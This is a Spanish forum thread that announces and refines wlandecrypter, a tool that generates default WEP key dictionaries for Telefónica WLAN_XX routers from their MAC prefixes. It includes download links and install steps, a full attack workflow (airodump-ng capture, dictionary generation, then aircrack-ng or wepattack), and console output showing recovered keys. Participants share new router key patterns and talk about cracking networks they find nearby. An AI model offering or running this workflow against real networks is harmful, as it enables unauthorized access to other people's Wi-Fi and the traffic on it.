-
wlandecrypter 1.3.4 (29.10.2012) <www.seguridadwireless.net>
Cambios:
- Añadidos patrones nuevos sobre las mac's 40:4A:03 y 50:67:F0 ya existentes.
- Eliminados datos extras en el diccionario resultante dejando solo las claves.
Descarga: http://www.seguridadwireless.net/archivos/wlandecrypter-1.3.4.tar.gz
MD5: 8dbc86051d3a6d0c10f35e744ffb15db
(https://hwagm.elhacker.net/wp-content/uploads/2012/10/wlandecrypter134.png)
wlandecrypter 1.3.3 (10.12.2011) <www.seguridadwireless.net>
Cambios:
- Añade mac C8:6C:87 (Cortesía de *dudux)
Descarga: http://www.seguridadwireless.net/archivos/wlandecrypter-1.3.3.zip
MD5: e14b2dce3e39274cfc798ebab8e2fafa
wlandecrypter 1.3.2 (02.02.2011) <www.seguridadwireless.net>
Cambios:
- Añade mac 50:67:F0 (gracias *dudux) y nuevo patrón de claves para la mac 00:23:F8 (gracias Jose CSS).
- Se escriben las claves más probables primero de todos los patrones de claves
que pueda tener cada mac para routers conocidos y con una WLAN_XX determinada.
Descarga: http://www.seguridadwireless.net/archivos/wlandecrypter-1.3.2.tar.gz
MD5: 507fe6988be1a1ee50df92a14cbefaf3
Descripción: Generador de diccionario de claves por defecto para routers Zyxel, Xavy, Comtrend y Thomson. Redes Wlan_XX.
Instalación:
make
make install (o sudo make install)
Desinstalar:
sudo make uninstall
Uso:
wlandecrypter [-e] <BSSID> <ESSID> [fichero]
wlandecrypter -a <ESSID> [fichero]
wlandecrypter -l
-l : lista en pantalla todos los routers conocidos
-a : genera diccionario para todos los routers y una WLAN_XX
-e : genera diccionario experimental para routers desconocidos
Si <ESSID> = WLAN_?? genera todas las redes desde WLAN_00 a WLAN_FF
Más Info -> README.txt
____________________________________________________________________
Descarga
http://www.wifiway.org/archivos/wlandecrypter-1.3.1.tar.gz
Módulo (por Garcad) -> http://dl.dropbox.com/u/6244383/Wifiway/Modulos/wlandecrypter-1.3.1.lzm
Version modificada por seguridadwireless
(http://i37.tinypic.com/2daet14.png)
(http://img142.imageshack.us/img142/7582/wlandecrypter06ys2.png)
Descarga
VERSION 0.6 Nuevas macs
Nuevas macs
00:02:CF:XX:XX:XX
00:1A:2B:XX:XX:XX
00:19:CB:XX:XX:XX
00:19:15:XX:XX:XX
VERSION 0.7
// Nuevas MACs
00:30:DA:XX:XX:XX
00:1D:20:XX:XX:XX
//Nuevas passwords
00:13:49:XX:XX:XX
00:1A:2B:XX:XX:XX
VERSION 0.8 para WLAN_XX con FTTH
//Nuevas passwords
00:19:CB:XX:XX:XX
VERSION 0.9 añadida un Zyxel
//Nuevas Macs
00:23:F8:XX:XX:XX
VERSION 1.0 añadida un Zyxel y un Xavi
//Nuevas Macs
00:01:36:XX:XX:XX
//Nuevas passwords
00:02:CF:XX:XX:XX
VERSION 1.1 Añadida funcion para essids cambiados y bssid de telef*nica
wlandecrypter 00:02:CF:BX:XX:XX WLAN_?? essidcambiado.txt
(http://i.elhacker.net/i?i=5RmK0ieHuctWckb6HGGZjGVo)
(http://i.elhacker.net/i?i=cNANsIRXpoupmxLDVt9go2Vo) (http://i.elhacker.net/d?i=cNANsIRXpoupmxLDVt9go2Vo)
Instalación
wget -c http://www.wifiway.org/archivos/wlandecrypter-1.1.tar.gz
tar zxvf wlandecrypter-1.1.tar.gz
cd wlandecrypter-1.1/
cat README.txt
make clean && make && make install
guepardo dudu # wlandecrypter
wlandecrypter 1.1 - 2007-2008-2009 dudu[at]seguridadwireless.net
2006 nilp0inter2k6_at_gmail.com
----------> http://www.seguridadwireless.net <----------
uso: wlandecrypter <bssid> <essid> [output file]
*Essid:
WLAN_?? : Para crear diccionario con todas las posibilidades.
guepardo dudu #
Descarga para Linux
http://www.wifiway.org/archivos/wlandecrypter-0.6.tar.gz
http://www.wifiway.org/archivos/wlandecrypter-0.7.tar.gz
http://www.wifiway.org/archivos/wlandecrypter-0.8.tar.gz
http://www.wifiway.org/archivos/wlandecrypter-0.9.tar.gz
http://www.wifiway.org/archivos/wlandecrypter-1.0.tar.gz
http://www.wifiway.org/archivos/wlandecrypter-1.1.tar.gz
http://www.wifiway.org/archivos/wlandecrypter-1.2.tar.gz
http://www.wifiway.org/archivos/wlandecrypter-1.3.1.tar.gz
Módulo (por Garcad) -> http://dl.dropbox.com/u/6244383/Wifiway/Modulos/wlandecrypter-1.3.1.lzm
Alternativos........
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.6.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.7.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.8.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.9.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-1.0.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-1.1.tar.gz
Descarga para windows
http://www.sendspace.com/file/ctctvj
Descarga para Openwrt (foneras)
http://www.tufonera.com/ftp/wlandecrypter.tar.gz
http://www.sendspace.com/file/kaf9vt
El codigo en
v0.7 -----> http://codepad.org/ZXRZvCvz
v0.8 -----> http://codepad.org/tFEcR59y
v1.1 -----> http://codepad.org/ApmfMyJH
Uso Minimo captura de 5 ivs
airodump-ng -w captura --channel 6 ath0
wlandecrypter 00:11:22:33:44:55 WLAN_00 diccionario00.txt
aircrack-ng -b 00:11:22:33:44:55 -w diccionario00.txt -K captura.cap
LECTURA OBLIGATORIA DEL README.txt
-
Genial, gracias dudu, pero.. y el link de descarga?
-
;D ;D
creo que pronto lo pondra
-
ya esta publico para todo el mundo
haber si alguien lo sube para descargar por wget
-
No se podría subir a googlecode, por ejemplo? en ArchLinux, cómo la web oficial de nilp0inter estaba caida, subieron su código aquí (http://code.google.com/p/wlandecrypter/).
Gracias Dudux por el link :)
-
subirlo dnd querais!
-
empeizen las apuestas de quienes modificaran
http://www.seguridadwireless.net
;D ;D
si bien siempre iremos por delante, porque nuestros expertos en cyptografia siempre estan trabajando en nuevos algoritmos, jejej, hasta suena bien.
----------------
pd: posiblemente acabermos haciendo lo mismo con los airoscript modificados por notrosos, ono, ya veremos
-
somos el "dream team" wifi ;D
-
muy bueno *dudux >:( >:( >:(
-
Hola que tal ,estoy algo verde en esto pero a ver si con vuestra ayuda lo consigo.
Os comento lanzo el wlandecrypter de la siguiente forma:
wlandecrypter 00:1A:2B:XX:XX:XX WLAN_A1 diccionario00.txt
donde 00:1A:2B:XX:XX:XX es el bssid de la red que quiero averiguar la clave wep y wlan_a1 es el essid de la misma, pero me sale un mensaje diciendo que no encuentra el bssid.
Por supuesto antes he lanzado el airodump y es la red que me sale.
Todo esto lo estoy haciendo con wifislax 3.1 y lanzando wlandecrypter0.6.tar.gz
Espero vuestra ayuda.
Un saludo
Gracias
-
Primer cosa borrrale los tres ultimos pares de numeros a esa mac, ¿o te gustaría a ti que yo publicara en el foro tu número de carnet de indentidad? supongo que no, pues esto es lo mismo.
Y no hay porqué postear doble que se ve igual posteando una vez sola como todo el mundo.
Un saludo 8) 8)
-
OK perdon pero como comento estoy un poco verde pero ya lo he corregido,y en cuanto a lo de postear dos veces es que al publicar la primera vez el mensaje se me habia quedado colgao y pense que no se habia publicado.
Gracias.
-
tienes que instalarlo en wifislax 3.1 y lugo lanzarlo,ya que esta distro lleva la 0.5
sino lo consigues, descarga wifiway 1.0 beta2,que lleva la 0.6
-
Ok, eh subido el archivo a:
http://www.fileden.com/files/2008/5/30/1937528/wlandecrypter-0.6.tar.gz
para que puedan bajarlo con el WGET !
Cualquier cosa manden PM
Saludos !
-
Buenas:
Tengo instalado el wifiway 1.0 beta2;
Tengo que actualizarlo con las nuevas macs del wlandecrypter?, o es la misma versión con las mismas macs?
Un saludo
-
es el mismo. pero en wifislax 3.1 esta el 0.5
-
Gracias :) :)
Un saludo
-
denada
saludos
-
Solo decir , muchas gracias , lo he probado y perfecto. ;D
-
ya tengo ganas de probarlo ;D
muchas gracias
-
^-^
-
Hola,he probado de compilar el wlandecrypter y no me ha funcionado ya que en las lineas 253 y 76 habia un simbolo de # delante del fprintf,los he borrado y ha funcionado correctamente
Un saludo
PD:Estoy trabajando en Kubuntu por si esto puede afectar en algo
-
es que he hecho cambios d dnd lo haaas bajado?
de megaupload no da el fallo
pruebalo y me dices
p.d.acabo de modificar el enlace de fileden,ya me dices algo
-
probado y funcionando >:(
-
Buenas dudux
Lo baje de fileden, ya lo he visto corregido,
Un saludo
-
brutal!
-
Perdonad, pero a que os referis con nuevas macs?
-
nuevos modelos de routers
-
Aja. Entonces deduzco que que llevan otro tipo de encriptacion que la version 0.5 no puede resolver, ¿me equivoco?
Gracias.
-
te equivocas.........
lleva mas routers que se pueden recuperar sus keys.........
es la version ultima
-
Hola. Quiero decir que la encriptacion de estos nuevos routers ¿es distinta?
-
averigualo tu mismo ;)
-
Hola *dudux. Quiza he planteado mal la pregunta.
Me refiero...cuando hablamos de wlan...hablamos de una compañia que las suministra.
La clave wep viene cifrada con un algoritmo en los propios datos que envia el router con el pc o viceversa.
Ese algoritmo ha sido descifrado y se ha dispuesto de una aplicacion (wlandecripter). Con solo unos pocos ivs o datas (no se cual es la diferencia)y el nombre de la red, ejecutando este programa nos da la clave.
Mi pregunta es el algoritmo de cifrado de la clave es distinto en esos nuevos routers ?
PD:Suponiendo todo esto con las opciones de fabrica claro.
Saludos. Agradezco vuestro trabajo.
-
Mi pregunta es el algoritmo de cifrado de la clave es distinto en esos nuevos routers ?
parecido......
-
Podrias ser mas explicito. Creo que no sera util para mi solo sino para todos los demas.
Chao.
-
Podrias ser mas explicito. Creo que no sera util para mi solo sino para todos los demas.
Chao.
explicito?......usa google y lee mas 8)
-
Ok. Gracias igualmente.
-
Despues de investigar un poco...
por si puede ayudar a alguien.
Es sencillo, no es que sea un nuevo algoritmo, simplemte se ha añadido esas nuevas macs, ya que pon ellas se forma parte de la clave.
Es que la compañia suministradora no va a cambiar nunca de algoritmo?
Chao a todos... ;)
-
Despues de investigar un poco...
por si puede ayudar a alguien.
Es sencillo, no es que sea un nuevo algoritmo, simplemte se ha añadido esas nuevas macs, ya que pon ellas se forma parte de la clave.
Es que la compañia suministradora no va a cambiar nunca de algoritmo?
Chao a todos... ;)
vemos que indagaas un poco... ;)
-
VERSION 0.7
// Nuevas MACs
00:30:DA:XX:XX:XX
00:1D:20:XX:XX:XX
//Nuevas passwords
00:13:49:XX:XX:XX
00:1A:2B:XX:XX:XX
VERSION 0.8 para WLAN_XX con FTTH
//Nuevas Macs
00:19:CB:XX:XX:XX
VERSION 0.9 añadida un Zyxel
//Nuevas Macs
00:23:F8:XX:XX:XX
(http://i.elhacker.net/i?i=5RmK0ieHuctWckb6HGGZjGVo) (http://i.elhacker.net/d?i=5RmK0ieHuctWckb6HGGZjGVo)
(http://i.elhacker.net/i?i=cNANsIRXpoupmxLDVt9go2Vo) (http://i.elhacker.net/d?i=cNANsIRXpoupmxLDVt9go2Vo)
Instalación
wget -c http://www.wifiway.org/archivos/wlandecrypter-0.7.tar.gz
tar zxvf wlandecrypter-0.7.tar.gz
cd wlandecrypter-0.7/
cat README.txt
make clean && make && make install
lenny dudu # wlandecrypter 00:19:CB:11:22:33 WLAN_FA FA.txt
wlandecrypter 0.8 - 2007-2008-2009 dudu[at]seguridadwireless.net
2006 nilp0inter2k6_at_gmail.com
----------> http://www.seguridadwireless.net <----------
uso: wlandecrypter <bssid> <essid> [output file]
[+] BSSID: 00:19:CB:11:22:33
[+] Modelo: Zyxel_660hw_FTTH
[+] ESSID: WLAN_FA
[+] Fichero de claves: FA.txt
[+] Fichero guardado
lenny dudu #
Descarga
http://www.wifiway.org/archivos/wlandecrypter-0.7.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.7.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.8.tar.gz
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.9.tar.gz
El codigo en
v0.7 -----> http://codepad.org/ZXRZvCvz
v0.8 -----> http://codepad.org/tFEcR59y
LECTURA OBLIGATORIA DEL README.txt
-
Oh qué grande x) , esperando a que lo publiques >:(
-
;D que buena pinta tiene
-
Hola, a tod@s,...
referente a la mac 00:1A:2B:XX:XX:XX con wlandecrypter no me funcionaba a pesar de la actualizacion realizada por *dudux.
Solucion....... dentro del script cambiar C0030DA por C001D20 (Comtrend nuevos 2007 ). guardais y volveis a compilar.
Por lo menos a mi en mi router que tiene esta mac me funciona.
*dudux, estoy seguro que este dato lo duplicaste por error por los nuevos Comtrend, ??? tenlo en cuenta en la nueva version que estas creando.
Gracias por tu trabajo.
Un saludo para todos
-
Hola, a tod@s,...
referente a la mac 00:1A:2B:XX:XX:XX con wlandecrypter no me funcionaba a pesar de la actualizacion realizada por *dudux.
Solucion....... dentro del script cambiar C0030DA por C001D20 (Comtrend nuevos 2007 ). guardais y volveis a compilar.
Por lo menos a mi en mi router que tiene esta mac me funciona.
*dudux, estoy seguro que este dato lo duplicaste por error por los nuevos Comtrend, ??? tenlo en cuenta en la nueva version que estas creando.
Gracias por tu trabajo.
Un saludo para todos
os equivocais todos ;D
antes era esa cabecera
ahora hay 2 opciones
en la 0.7 esta incluida!
https://foro.seguridadwireless.net/enlaces_descarga_aplicaciones_wireless_linux/wlandecrypter_07_nuevo-t17647.0.html;msg99575#msg99575
-
nice tool mmm link to download it ? tenemos que esperar?
-berz3k.
-
nice tool mmm link to download it ? tenemos que esperar?
-berz3k.
no podeis esperar a que salga wifiway?
esta horneandose
-
os equivocais todos ;D
antes era esa cabecera
ahora hay 2 opciones
en la 0.7 esta incluida!
https://foro.seguridadwireless.net/enlaces_descarga_aplicaciones_wireless_linux/wlandecrypter_07_nuevo-t17647.0.html;msg99575#msg99575
Que me equivoco ?. xDDDD pareces ofendido de como respondes..... mi intencion ha sido compartir mi informacion en el foro.
Solo te digo una cosa, que antes no me funcionaba con la mac 00:1A:2B:XX:XX:XX y modificando el script por otro dato si funciona.
*dudux cual es el problema ? donde me equivoco ?
Un saludo
-
os equivocais todos ;D
antes era esa cabecera
ahora hay 2 opciones
en la 0.7 esta incluida!
https://foro.seguridadwireless.net/enlaces_descarga_aplicaciones_wireless_linux/wlandecrypter_07_nuevo-t17647.0.html;msg99575#msg99575
Que me equivoco ?. xDDDD pareces ofendido de como respondes..... mi intencion ha sido compartir mi informacion en el foro.
Solo te digo una cosa, que antes no me funcionaba con la mac 00:1A:2B:XX:XX:XX y modificando el script por otro dato si funciona.
*dudux cual es el problema ? donde me equivoco ?
Un saludo
todo el mundo se equivoca,somos humanos,lo que tu dices que me equivoque.....
y no fue asi
y por eso me rio
mira quee te mande un privado con sorpresa ;)
*dudux, estoy seguro que este dato lo duplicaste por error por los nuevos Comtrend
stas seguro?
-
8) 8) 8) 8) 8) Ya se nos cae la saliba de verlo en wifiway ¡Que salga ya la nueva versión! xD Anda que no tenéis cosas para agregarle a la anterior :O
-
yo esperaria asta que saliera la version estable de tkiptun-ng y bombazoooooo ;D
-
8) 8) 8) 8) 8) Ya se nos cae la saliba de verlo en wifiway ¡Que salga ya la nueva versión! xD Anda que no tenéis cosas para agregarle a la anterior :O
muy pronto ;)
yo esperaria asta que saliera la version estable de tkiptun-ng y bombazoooooo ;D
bombazo ya va a ser,pq siempre lo es ;D
-
yo esperaria asta que saliera la version estable de tkiptun-ng y bombazoooooo ;D
bombazo ya va a ser,pq siempre lo es ;D
[/quote]
tienes toda la razon! ;D
pd. No nos podrias adelantar un tiempo de referencia para la salida? ^-^ >:D
-
Buenas:
Los milagros siempre son por estas fechas....no? ^-^ ;)
Un saludo
ChimoC
-
pues cualquier dia de estos os damos un sorpreson,la captura del wlandecrypter 0.7 es de alguna RC de wifiway........asi que pronto........
aunque aun no sabemos cuando
-
Esperare ansioso, pues ganas no faltan.. >:(
Me acabo de dar cuenta que esta misma noche se ha publicado :)
-
Esperare ansioso, pues ganas no faltan.. >:(
Me acabo de dar cuenta que esta misma noche se ha publicado :)
ya sabeis a disfrutarlo
-
El codigo en
http://codepad.org/ZXRZvCvz
Descarga
http://www.wifiway.org/archivos/wlandecrypter-0.7.tar.gz
-
Buenas, estoy intentando instalar wlandecrypter en el BT3 y no hay forma.
He probado dando todos los permisos posibles a los archivos pero aún así no hay manera.
cuando hago make clean && make install el resultado es:
rm -f wlandecrypter
install -d /usr/sbin
install -m 755 wlandecrypter /usr/sbin
install: cannot stat 'wlandecrypter': No such file or directory
make: *** [install] Error 1
Alguna sugerencia?
ACTUALIZADO:
podria eliminar el mensaje pero quizás alguien se encuentre el mismo problema.
En el archivo descargado hay un README.TXT, en donde la instrucción de instalación es make clean && make
Con esto se me intala perfectamente ;)
-
Existe algún programa o alguna manera para poder conocer cual de estos claves, que genera el wlandecrypter es valido?
-
Buenas:
Debes obtener por lo menos un par de datas y luego usar el wlandecrypter
Un saludo
ChimoC
-
Un manual? es que no entendido.
Porqe yo entendido que wlandecrypter es solo para generar los claves, no?
Y despues con diccionario con aircrack o como?
jazzteldecrypter 00:11:22:33:44:55 JAZZTEL_XX diccionario.txt
aircrack-ng -b 00:11:22:33:44:55 -w diccionario.txt captura.cap
Iwal que esto su pongo voy a probar! gracias!
1. I para wep/wep2 tb funciona (si no han cambiado claves)?
2. Puedo generar a la vez todos variantes desde WLAN_00... WLAN_01... hasta WLAN_FF? o a lo mejor que ya existe este diccionario con todo (dlink, jazztel, etc) generado?
-
La gracia del wlandecrypter esta en generar el diccionario para la red de la que quieres obtener la clave.
Como cada red tiene un BSSID distinto, además del ESSID (WLAN_XX), generar un diccionario con todas las posibilidades conllevaria que el aircrack perdiera el tiempo probando otras claves.
-
usar wlandecrypter para un soolo BSSID, y usarlo con wepattack o con aircrack
quien pide manual es que no ha buscado en google,pq sino solo diria que gracias >:D
Para mi la mejor opcion es con 1 data y wepattack
lenny scripts # wlandecrypter 00:01:38:CC:??:?? WLAN_?? | wepattack -f callejon-01.cap
Extraction of necessary data was successfull!
Founded BSSID:
1) 00 01 38 CC ?? ?? / Key 0
1 network loaded...
Accepting wordlist data...
wlandecrypter 0.7 - 2007-2008 dudu[at]seguridadwireless.net
2006 nilp0inter2k6_at_gmail.com
----------> http://www.seguridadwireless.net <----------
uso: wlandecrypter <bssid> <essid> [output file]
- BSSID: 00:01:38:CC:??:??
- Modelo: Xavi 7768r
- ESSID: WLAN_??
- Seleccionada salida estandar
key no. 10000: X000138270F??
key no. 20000: X0001384E1F??
key no. 30000: X000138752F??
key no. 40000: X0001389C3F??
key no. 50000: X000138C34F??
++++++++++ Packet decrypted! ++++++++++
BSSID: 00 01 38 CC ?? ?? / Key 0 WepKey: 58 30 30 30 31 33 38 43 43 39 38 4? ?? (X000138CC98??)
Encryption: 128 Bit
time: 2.527154 sec words: 52378
lenny scripts #
-
VERSION 0.8 para WLAN_XX con FTTH (Fibra optica hasta casa)
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.8.tar.gz
P.D. gracias Sycho ;)
lenny wlandecrypter-0.8 # wlandecrypter 00:19:CB:11:22:33 WLAN_FA FA.txt
wlandecrypter 0.8 - 2007-2008-2009 dudu[at]seguridadwireless.net
2006 nilp0inter2k6_at_gmail.com
----------> http://www.seguridadwireless.net <----------
uso: wlandecrypter <bssid> <essid> [output file]
[+] BSSID: 00:19:CB:11:22:33
[+] Modelo: Zyxel_660hw_FTTH
[+] ESSID: WLAN_FA
[+] Fichero de claves: FA.txt
[+] Fichero guardado
-
creo que hoy e visto una WLAN_BA con mac 00:23:F8:XX:XX:XX
y esta es nueva...........a ver si puedo sacar info
-
creo que hoy e visto una WLAN_BA con mac 00:23:F8:XX:XX:XX
y esta es nueva...........a ver si puedo sacar info
Yo ayer también la vi una 00:23:F8:XX:XX:XX y por lo visto no esta ni en esta nueva version de Wlandecrypter... :S
-
creo que hoy e visto una WLAN_BA con mac 00:23:F8:XX:XX:XX
y esta es nueva...........a ver si puedo sacar info
Yo ayer también la vi una 00:23:F8:XX:XX:XX y por lo visto no esta ni en esta nueva version de Wlandecrypter... :S
pues ya sabes......mandamela
-
*dudux que te tengo que mandar...?
Si supiera el fabricante de la mac podria saber si es una X-Z-C0023F8****C0 ->Es una WLAN_C0
He sacado ya 300.000 IVs y nada... no sale xD como puedo crear un diccionario a mano yo... hay posibilidad?
Edit:
Ya tengo algo más, esa mac pertenece a Zyxel; "00:23:F8 ZyxelCommu # ZyXEL Communications Corporation
"
Con eso creo que ya se puede elaborar un diccionario no (no tengo ni p... idea pero por lo que visto y por lógica creo que si)
Sería crear todas las posibilidades desde Z0023F8****C0 para una WLAN_C0, no? como podría crear el diccionario... o actualiza tu magnifico wlandecrypter ^^
Edito de nuevo xD:
A ver he creado un diccionario con la mac de mi zyxel pero poniendo WLAN_C0 en el essid, asique sale algo asi: Z0002CF****C0, asique he cogido el notepad++ y he remplazado el Z0002CF por el Z0023F8, en principio mañana cuando intente comprobar la bulnerabilidad de este nuevo router de zyxel... con pocas IVs y usando este diccionario "casero" devería de sacarla no?
-
*dudux que te tengo que mandar...?
Si supiera el fabricante de la mac podria saber si es una X-Z-C0023F8****C0 ->Es una WLAN_C0
He sacado ya 300.000 IVs y nada... no sale xD como puedo crear un diccionario a mano yo... hay posibilidad?
Edit:
Ya tengo algo más, esa mac pertenece a Zyxel; "00:23:F8 ZyxelCommu # ZyXEL Communications Corporation
"
Con eso creo que ya se puede elaborar un diccionario no (no tengo ni p... idea pero por lo que visto y por lógica creo que si)
Sería crear todas las posibilidades desde Z0023F8****C0 para una WLAN_C0, no? como podría crear el diccionario... o actualiza tu magnifico wlandecrypter ^^
mandame una captura con algun data.........con uno me bastaria para probar todos los diccionarios posibles...........es un zyxel asi que prueba a crear un diccionario como si para un zyxel se tratase Z0002CF ,Z001349........Y a ver si suena la campana .......
otra es crear ese diccionario que dices.......si quieres te lo mando..........o mas facil pasame alguna captura.....
voy a crearte una version 0.9 beta.........y te la paso....va? y luego vemos......estate conectado y te la paso mañana...
300.000 ivs? usaste aircrack-ptw?¿
-
te he mandado un privado ahora.....
-
Use airoscript xDDD sq soy muy vago :P :P :P yo le doy al 4 haha!!! pero es un PIII tal vez le cueste mucho descifrar tanto paquete :S :S, intente copiarme el .cap en el pendrive... pero no me dejaba :S :S porq puede ser?? sq quería traer la captura a mi casa para investigarlo a fondo... pero no podia... si en el caso de q este diccionario no me valga... como puedo hacer para copiar una captura?¿
-
Use airoscript xDDD sq soy muy vago :P :P :P yo le doy al 4 haha!!! pero es un PIII tal vez le cueste mucho descifrar tanto paquete :S :S, intente copiarme el .cap en el pendrive... pero no me dejaba :S :S porq puede ser?? sq quería traer la captura a mi casa para investigarlo a fondo... pero no podia... si en el caso de q este diccionario no me valga... como puedo hacer para copiar una captura?¿
bufff airoscript!!!!!
por eso no te la da ..........tienes ahora el cap?dale internet y mandamelo por cable.......
o monta un pendrive y copialo arrastrandolo de /root
cualquier sistema de archivos es escribible,si es ntfs hay que montarlo con ntfs-3g
bueno si te hago una version beta sabras instarla?
-
tar -zxvf nombredearchivo
entro en direccitorio
make clean && make && make install
asi a mi me funciona ^^ xD
si uso el airoscript por perrería, aunque siempre la habia sacado usando:
aircrack-ng -b MAC -w diccionario.txt cap.cap
Estaría todo correcto no? o uso el aircrack-ptw, nunca había usado eso... viene con wifislax o wifiway? ni se me ocurrió probar nunca... pues, como he dicho es en casa de un amigo, mañana mismo me acerco y lo pruebo... de todas maneras alli esta el pc ahora mismo capturando, si me pasas esa beta la instalo y se prueba, 100 datas se consigen pronto, que suele haber un cliente.
Muchas gracias.
-
pasame un email por privado y te la mando.......
-
tiomasclet wlandecrypter-0.8 # ./wlandecrypter
wlandecrypter 0.9 - 2007-2008-2009 dudu[at]seguridadwireless.net
2006 nilp0inter2k6_at_gmail.com
----------> http://www.seguridadwireless.net <----------
uso: wlandecrypter <bssid> <essid> [output file]
Z0002CFFFF4C0
Z0023F8FFF5C0
Z0002CFFFF5C0
Z0023F8FFF6C0
Z0002CFFFF6C0
Z0023F8FFF7C0
Z0002CFFFF7C0
Z0023F8FFF8C0
Z0002CFFFF8C0
Z0023F8FFF9C0
Z0002CFFFF9C0
Z0023F8FFFAC0
Z0002CFFFFAC0
Z0023F8FFFBC0
Z0002CFFFFBC0
Z0023F8FFFCC0
Z0002CFFFFCC0
Z0023F8FFFDC0
Z0002CFFFFDC0
Z0023F8FFFEC0
Z0002CFFFFEC0
Z0023F8FFFFC0
Z0002CFFFFFC0
3 CABECERAS...........
te lo mando...........
-
Perfect!! Ya se puede bautizar el wlandecrypter-0.9 sin el Beta :P hoy mismo he conseguído sacar la cabecera sin ningun problema, no he podido probarlo con 4IVs pero vamos, la saque con 69IVs (curioso nº ^^) porque deje capturando sin cliente unas horas mientras me ausentaba del lugar jaja.
Pues lo dicho, por lo que se ve Zyxel se a apropiado de nuevo rango de MACs y la 00:23:F8 la esta usando en alguno routers de telefonica ya...
Muchisimas gracias *dudux por el tiempo dedicado, y haberme hecho "tester" de esa 0.9 Beta >:(
-
Hola,
Me podeis decir como puedo usar la version 0.8 en el WIFISLAX 3.1 LIVE CD???
Explicarmelo por favor.
Un saludo
-
diras la version 0.9...........
mira el principio de los posts y veras informacion...............
-
aqui lo teneis................
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.9.tar.gz
-
>:( >:( >:( >:(
-
wlandecrypter es la bomba >:(
-
jajaja es muy simple añadir cabeceras
-
jajaja es muy simple añadir cabeceras
pero no es simple preocuparse por añadirlas, un salduo y gracias
-
jajaja es muy simple añadir cabeceras
pero no es simple preocuparse por añadirlas, un salduo y gracias
menos mal que hay alguien que se da cuenta de que hay gente que se preocupa por que esto siga funcionando.
muchas gracias, ha sido todo un detalle por tu parte.
un saludo ;)
-
NEWS!!!
WLAN_26 con MAC 00:01:36:XX:XX:XX
Y según esta fuente http://anonsvn.wireshark.org/wireshark/trunk/manuf (http://anonsvn.wireshark.org/wireshark/trunk/manuf) la MAC es propiedad de CybertanTe # CyberTAN Technology, Inc.
Un nuevo fabricante que suministra routers de telefonica ? o no tiene nada que ver con lo hasta ahora visto...
dudux te he mandado un mail con la captura... son unos 2500 datas.... a ver que se puede hacer :D
-
NEWS!!!
WLAN_26 con MAC 00:01:36:XX:XX:XX
Y según esta fuente http://anonsvn.wireshark.org/wireshark/trunk/manuf (http://anonsvn.wireshark.org/wireshark/trunk/manuf) la MAC es propiedad de CybertanTe # CyberTAN Technology, Inc.
Un nuevo fabricante que suministra routers de telefonica ? o no tiene nada que ver con lo hasta ahora visto...
dudux te he mandado un mail con la captura... son unos 2500 datas.... a ver que se puede hacer :D
ok.
-
wlandecrypter 1.0 - 2007-2008-2009 dudu[at]seguridadwireless.net
2006 nilp0inter2k6_at_gmail.com
----------> http://www.seguridadwireless.net <----------
uso: wlandecrypter <bssid> <essid> [output file]
[+] BSSID: 00:01:36:0A:AD:96
[+] Modelo: Xavi_2009
[+] ESSID: WLAN_26
[+] Seleccionada salida estandar
Extraction of necessary data was successfull!
Founded BSSID:
1) 00 01 36 0A AD 96 / Key 0
1 network loaded...
Accepting wordlist data...
key no. 10000: X000136270F26
key no. 20000: X0001364E1F26
key no. 30000: X000136752F26
key no. 40000: X0001369C3F26
key no. 50000: X000136C34F26
key no. 60000: X000136EA5F26
time: 5.772266 sec words: 65538
es casi seguro una nueva cabecera
-
Pues investigare... vamos intentare sacar a pelo... y a ver que utiliza... con cualquier cosa ya informo ;)
-
Pues investigare... vamos intentare sacar a pelo... y a ver que utiliza... con cualquier cosa ya informo ;)
ok........probe X000136.....XX
Z000136
ETC etc
ya me dices
-
Pues investigare... vamos intentare sacar a pelo... y a ver que utiliza... con cualquier cosa ya informo ;)
ok........probe X000136.....XX
Z000136
ETC etc
ya me dices
Aunque ya te mande mail, lo comento por aquí... que esa MAC aparece en un router Xavi 7768r que tenía por ahí... acabo de descubrilo, todavía no se nada, pero en cuanto sepa algo... informo ^^
-
Pues investigare... vamos intentare sacar a pelo... y a ver que utiliza... con cualquier cosa ya informo ;)
ok........probe X000136.....XX
Z000136
ETC etc
ya me dices
Aunque ya te mande mail, lo comento por aquí... que esa MAC aparece en un router Xavi 7768r que tenía por ahí... acabo de descubrilo, todavía no se nada, pero en cuanto sepa algo... informo ^^
aqui estamos..........
-
key found!!!
Nueva Mac 00:01:36:XX:XX:XX en wlandecrypter 1.0
tiomasclet wlandecrypter-0.9 # ./wlandecrypter 00:01:36:??:??:?? WLAN_?? | wepattack -f /media/burrita/000136-01.cap
wlandecrypter 1.0 - 2007-2008-2009 dudu[at]seguridadwireless.net
2006 nilp0inter2k6_at_gmail.com
----------> http://www.seguridadwireless.net <----------
uso: wlandecrypter <bssid> <essid> [output file]
[+] BSSID: 00:01:36:0?:??:??
[+] Modelo: Xavi_2009
[+] ESSID: WLAN_??
[+] Seleccionada salida estandar
Extraction of necessary data was successfull!
Founded BSSID:
1) 00 01 36 ??????6 / Key 0
1 network loaded...
Accepting wordlist data...
key no. 10000: X000138270F??
++++++++++ Packet decrypted! ++++++++++
BSSID: 00 01 36 ????????? / Key 0 WepKey: 58 30 30 30 31 33 38 33 33 38 30 ?? ??(X0001383380??)
Encryption: 128 Bit
time: 1.249503 sec words: 13186
aqui teneis el codigo......
http://codepad.org/xYTTsE3G
mañana os cuelgo el paquete
-
hay va............
LEERSE EL README.TXT
VERSION 1.0 añadida un Zyxel y un Xavi
//Nuevas Macs
00:01:36:XX:XX:XX
//Nuevas passwords
00:02:CF:XX:XX:XX
http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-1.0.tar.gz
-
>:(
-
;D
joder ya vamos por la 1.0 >:( >:(
pd: subelo ya compilado, jeejje, y que se jodan los que venden lanzadores de ))))) para win, jejejejejej
-
;D
